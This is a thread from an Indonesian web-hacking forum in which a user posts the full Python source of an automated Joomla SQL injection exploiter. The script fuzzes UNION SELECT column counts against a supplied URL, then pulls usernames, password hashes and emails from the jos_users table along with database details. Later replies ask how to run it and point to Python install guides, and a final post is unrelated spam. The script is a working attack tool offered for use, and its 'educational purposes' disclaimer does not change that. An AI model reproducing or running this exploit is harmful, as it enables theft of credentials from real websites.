koding sql jombla

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
Tool3
Posts: 99
Joined: Sun Feb 22, 2009 6:54 pm
Contact:

Re: koding sql jombla

Post by Tool3 » Fri Jun 18, 2010 8:29 am

cyber_terror1st wrote:
Tool3 wrote::circle:
moga membantu para master jomla untuk memperbaiki kelemahan di jomla :tapa:

Code: Select all

http://www.4shared.com/document/0AxFKjHu/joomla_sqli_sploiterpy.html
:maaf:

Code: Select all

#!/usr/bin/python

# Automated Joomla SQL Injection Exploiter
# by Valentin Hoebel ([email protected])
# Version 1.0  (23th May 2010)
#
# This tool is based on my column fuzzer
# ASCII FOR BREAKFAST
#
#
# About the tool
# ----------------------------------------------------------------------------------
# Features:
#- Check if URL is reachable
#- Fuzz amount of columns (needed for UNION SELECT attack)
#- Show a sample exploitation URL for pasting into the browser
#- Showing the Joomla users from the table jos_users (with password hashes)
#- Display current database, db user and db version

# The Automated Joomla SQL Injection Exploiter is able to 
# exploit most of the SQL injection vulnerabilities which were ever
# fdiscovered for Joomla or it's components, modules and plugins.
# Simply hand over a vulnerable URL to this tool and receive the
# admin login data of the vulnerable Joomla installation.
#
# With this tool it is no longer necessary to write new exploits for new
# Joomla (components/modules/plugins) vulnerabilities!
 
# Usage example:
# python joomla_sqli_sploiter.py - u "http://target/index.php?option=com_component?id=1"

# The tool tries to exploit SQL injection vulnerabilities by using UNION SELECT. Therefore
# it is necessary to fuzz the number of columns.
# If this is successfull, the tool crafts a SQL injection URL for reading out the Joomla user table.
#
# Since most of the stuff is dynamic this tool can be enhanced easely to do also other things.
# Feel free to use, modify, distribute and share this code as you like! Power to teh cows!

# This tool war written for educational purposes only. I am not responsible for any damage
# you might cause using this tool. Know and respect your local laws!
# Only use this tool on websites you are allowed to test :)


# Greetz && THX
# ----------------------------------------------------------------------------------
# Special greetings to  cr4wl3r (you know why :) !)
# Greetz && THX to: inj3ct0r, Exploit DB team, hack0wn (especially to /JosS) and the Packet Storm staff!
# Thanks osvdb staff + moderators for your daily work! There are many people who appreciate what you are doing!
#
# Power to the cows!

import sys,  re,  urllib,  urllib2,  string
from urllib2 import Request, urlopen, URLError, HTTPError

# Define the max. amounts for trying
max_columns = 100

# Prints usage
def print_usage():
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
    print " by Valentin Hoebel ([email protected])"
    print ""
    print " Exploits almost every SQL injection vulnerability which was ever discovered"
    print " for Joomla and it's components/modules/plugins. It works also for feature(new)"
    print " vulnerabilities, so no new exploits are needed!"
    print ""
    print " Simply give this tool the vulnerable URL and receive the Joomla user table!"
    print ""
    print " Usage:"
    print "         -u <URL> (e.g. -u \"http://target/index.php?option=com_vulnerable&katid=1\")"
    print "         --help   (displays this text)"
    print ""
    print ""
    print " Features:"
    print " - Check if URL is reachable"
    print " - Fuzz amount of columns (needed for UNION SELECT attack)"
    print " - Show a sample exploitation URL for pasting into the browser"
    print " - Showing the Joomla users from the table jos_users (with password hashes)"
    print " - Display current database, db user and db version"
    print ""
    print " For educational purposes only! I am not responsible if you cause any damage!"
    print " Only use this tool on websites which you may test, e.g. for penetration testing."
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    print ""
    return

#Prints banner
def print_banner():
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
    print " by Valentin Hoebel ([email protected])"
    print ""
    print " For educational purposes only! I am not responsible if you cause any damage!"
    print " Only use this tool on websites which you may test, e.g. for penetration testing."
    print ""
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    print ""
    return

# Testing if URL is reachable, with error handling
def test_url():
    print ">> Checking if connection can be established..."
    try:
        response = urllib2.urlopen(provided_url)
        
    except HTTPError,  e:
        print ">> The connection could not be established."
        print ">> Error code: ",  e.code
        print ">> Exiting now!"
        print ""
        sys.exit(1)
    except URLError,  e:
        print ">> The connection could not be established."
        print ">> Reason: ",  e.reason
        print ">> Exiting now!"
        print ""
        sys.exit(1)
    else:
        valid_target = 1
        print ">> Connected to target! URL seems to be valid."
        print ""
    return

# Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities
def find_columns():
    # Define some important variables and make the script a little bit dynamic
    number_of_columns = 1
    column_finder_url_string = "+AND+1=2+UNION+SELECT+"
    column_finder_url_message = "0x503077337220743020743368206330777321"
    column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
    column_finder_url_terminator = "+from+jos_users--"
    column_finder_url_terminator_2 = "--"
    next_column = ","
    column_finder_url_sample_2 = "concat_ws(0x3b,user(),database(),version())"
    column_finder_url_sample_3 = "concat_ws(0x3b,0x503077337220743020743368206330777321,user(),database(),version(),0x503077337220743020743368206330777321)"
    column_finder_url_sample = "concat_ws(0x3b,0x503077337220743020743368206330777321,id,name,username,password,email,usertype,0x503077337220743020743368206330777321)"
    
    # Craft the final URL to check
    final_check_url = provided_url+column_finder_url_string+column_finder_url_message 
    print ">> Assuming that your provided URL is vulnerable."
    print ">> Trying to find the correct number of columns... (this may take a while)"
    
    for x in xrange(1, max_columns):
        # Visit website and store response source code of site
        final_check_url2 = final_check_url+column_finder_url_terminator 
        response = urllib2.urlopen(final_check_url2)
        html = response.read()
        find_our_injected_string = re.findall(column_finder_url_message_plain, html)
        
        # When the correct amount was found we display the information and exit
        if len(find_our_injected_string) != 0:
            print ">> Correct number of columns found!"
            print ">> Amount: ",  number_of_columns
            
            # Offer to display a sample exploitation URL for pasting into the browser
            print ""
            user_reply = str(raw_input(">> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) "))
            if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                
                # Print a sample URL for exploiting and replace test string with some useful stuff
                print ""
                final_check_url3 = final_check_url+column_finder_url_terminator_2
                print string.replace(final_check_url3, column_finder_url_message, column_finder_url_sample_2)
                print ""
                print ">> Simply copy and paste this link into your browser :) Moving on..."
            else:
                print ">> Viewing a sample exploitation URL was skipped!"
                          
                
            # Craft our exploit query
            malicious_query =  string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
            print ""      
            print ">> Now assuming that this is a Joomla installation."
            print ">> Trying to fetch the first user of the Joomla user table..."

            # Receive the first user of the Joomla user table
            response = urllib2.urlopen(malicious_query)
            html = response.read()
            get_secret_data = string.find(html,  "P0w3r t0 t3h c0ws!")
            get_secret_data += 18
            new_html = html[get_secret_data :]
            new_get_secret_data = string.find(new_html,  "P0w3r t0 t3h c0ws!")
            new_html_2 = new_html[:new_get_secret_data]
            
            # Data was received, now format and display it
            formatted_output = str.split(new_html_2,  ";")
            print "ID: ",  formatted_output[1:2]
            print "Name: ",  formatted_output[2:3], "Username: ",  formatted_output[3:4]
            print "Password Hash: ",  formatted_output[4:5]
            print "E-Mail Address: ",  formatted_output[5:6],  "User status: ",  formatted_output[6:7]
            
            # Offer to display all entries of the Joomla user table
            print ""
            user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) "))
            if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                print ""
                print "-------------------------------------------------------------"
                print str.split(new_html,  ";") 
                print "-------------------------------------------------------------"
                print "The seperator for the single entries is: ",  column_finder_url_message_plain
                print "So it is this pattern: seperator id;name;username;password;email address;user status seperator"
                print "I know, formatting is bad, but this will be improved soon."

            else:
                print ">> Viewing the Joomla user table output was skipped!"
            
            # Offer to display current database, user and MySQL version
            print ""
            user_reply = str(raw_input(">> Do you want to display the current database, database user and MySQL version? (Yes/No) "))
            if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                # Crafting the final URL
                final_check_url4 = final_check_url+column_finder_url_terminator_2
                informative_query = string.replace(final_check_url4, column_finder_url_message, column_finder_url_sample_3)
                
                # Getting the data
                response4 = urllib2.urlopen(informative_query)
                html4 = response4.read()
                
                # Now extract the interesting information
                get_secret_data = string.find(html4,  "P0w3r t0 t3h c0ws!")
                get_secret_data += 18
                new_html4 = html4[get_secret_data :]
                new_get_secret_data4 = string.find(new_html4,  "P0w3r t0 t3h c0ws!")
                new_html_5 = new_html4[:new_get_secret_data4]
            
                # Data was received, now format and display it
                formatted_output = str.split(new_html_5,  ";")
                print "MySQL Database User: ",  formatted_output[1:2]
                print "MySQL Database: ",  formatted_output[2:3]
                print "MySQL Version: ",  formatted_output[3:4]
                print "That's it. Bye!"
                print ""
                print ""
                sys.exit(1)
            
            else:
                print ">> Viewing the informative data was skipped!"
                print "That's it. Bye!"
                print ""
                print ""
                sys.exit(1)
        
        # Increment counter var by one
        number_of_columns  += 1
        
        #Add a new column to the URL
        final_check_url += next_column
        final_check_url += column_finder_url_message         
     
    # If fuzzing is not successfull print this message 
    print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"
    print "Bye!"
    print ""
    print ""
    
# Checking if argument was provided
if len(sys.argv) <=1:
    print_usage()
    sys.exit(1)
    
for arg in sys.argv:
    # Checking if help was called
    if arg == "--help":
        print_usage()
        sys.exit(1)
    
    # Checking if  URL was provided, if yes -> go!
    if arg == "-u":
        provided_url = sys.argv[2]
        print_banner()
        
        # At first we test if we can actually reach the provided URL
        test_url()
        
        # Now start with finding the correct amount of columns
        find_columns()
    
### EOF ###




jujur saja,saya tidak paham dengan penjabaran diatas
mohon bantuan penjelasan dengan bahasa sehari2 ya kk

:kaca: modal seorang progamer adalah bhasa inggris jangan biasakan membaca bhasa indo kadang kala bhasa komputer di indonesia beda

User avatar
Tool3
Posts: 99
Joined: Sun Feb 22, 2009 6:54 pm
Contact:

Re: koding sql jombla

Post by Tool3 » Fri Jun 18, 2010 8:31 am

shinichi81 wrote:harus instal dulu program perl-nya bos...........
:maaf: coba pelajari dulu ya sob ^_^

Code: Select all

http://www.python.org/download/&sa=X&ei=KMwaTK3aOIzRcdGQ6a8K&ved=0CCYQqwMoADAA&usg=AFQjCNFZroRAKchC97gMEyHRsCZdyQDzgg

User avatar
nesta
Posts: 555
Joined: Fri May 08, 2009 12:17 am
Contact:

Re: koding sql jombla

Post by nesta » Sat Jun 26, 2010 7:47 am

buat yang post tool mohon untuk menyebutkan dimana sumber dari tool atopun script yang di post.
oya om bisa gak di jelaskan lebih detail tentang cara penggunaan tuh script...
terus tuh script di simpan dalam bentuk apa??? terima kasih
imajinasi jauh lebih penting dari pada pengetahuan

User avatar
Darkzzzz
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Contact:

Re: koding sql jombla

Post by Darkzzzz » Sat Jun 26, 2010 11:02 am

nesta wrote:buat yang post tool mohon untuk menyebutkan dimana sumber dari tool atopun script yang di post.
oya om bisa gak di jelaskan lebih detail tentang cara penggunaan tuh script...
terus tuh script di simpan dalam bentuk apa??? terima kasih
Itu phyton sepertinya, so... Harus di exec lewat Linux
Tapi di Windows juga bisa jalanin python, nih baca tutorial Om Shad : viewtopic.php?f=98&t=37514&hilit=install+python :love:
Monggo di coba, kalo sukses sharing2 yach :licik:
I'm not A Hacker, But I'm A Image

User avatar
Tool3
Posts: 99
Joined: Sun Feb 22, 2009 6:54 pm
Contact:

Re: koding sql jombla

Post by Tool3 » Thu May 05, 2011 8:52 pm

hu uh..... sob..........

sofia66
Posts: 1
Joined: Thu Jan 25, 2024 12:51 am
Location: united states
Contact:

Re: koding sql jombla

Post by sofia66 » Thu Jan 25, 2024 12:55 am

Creating an SQL database schema named "jombla." Structuring databases with precision ensures efficient data management. Commenting on each step clarifies code intent, enhancing collaboration and maintenance.

Post Reply

Return to “Web Hacking”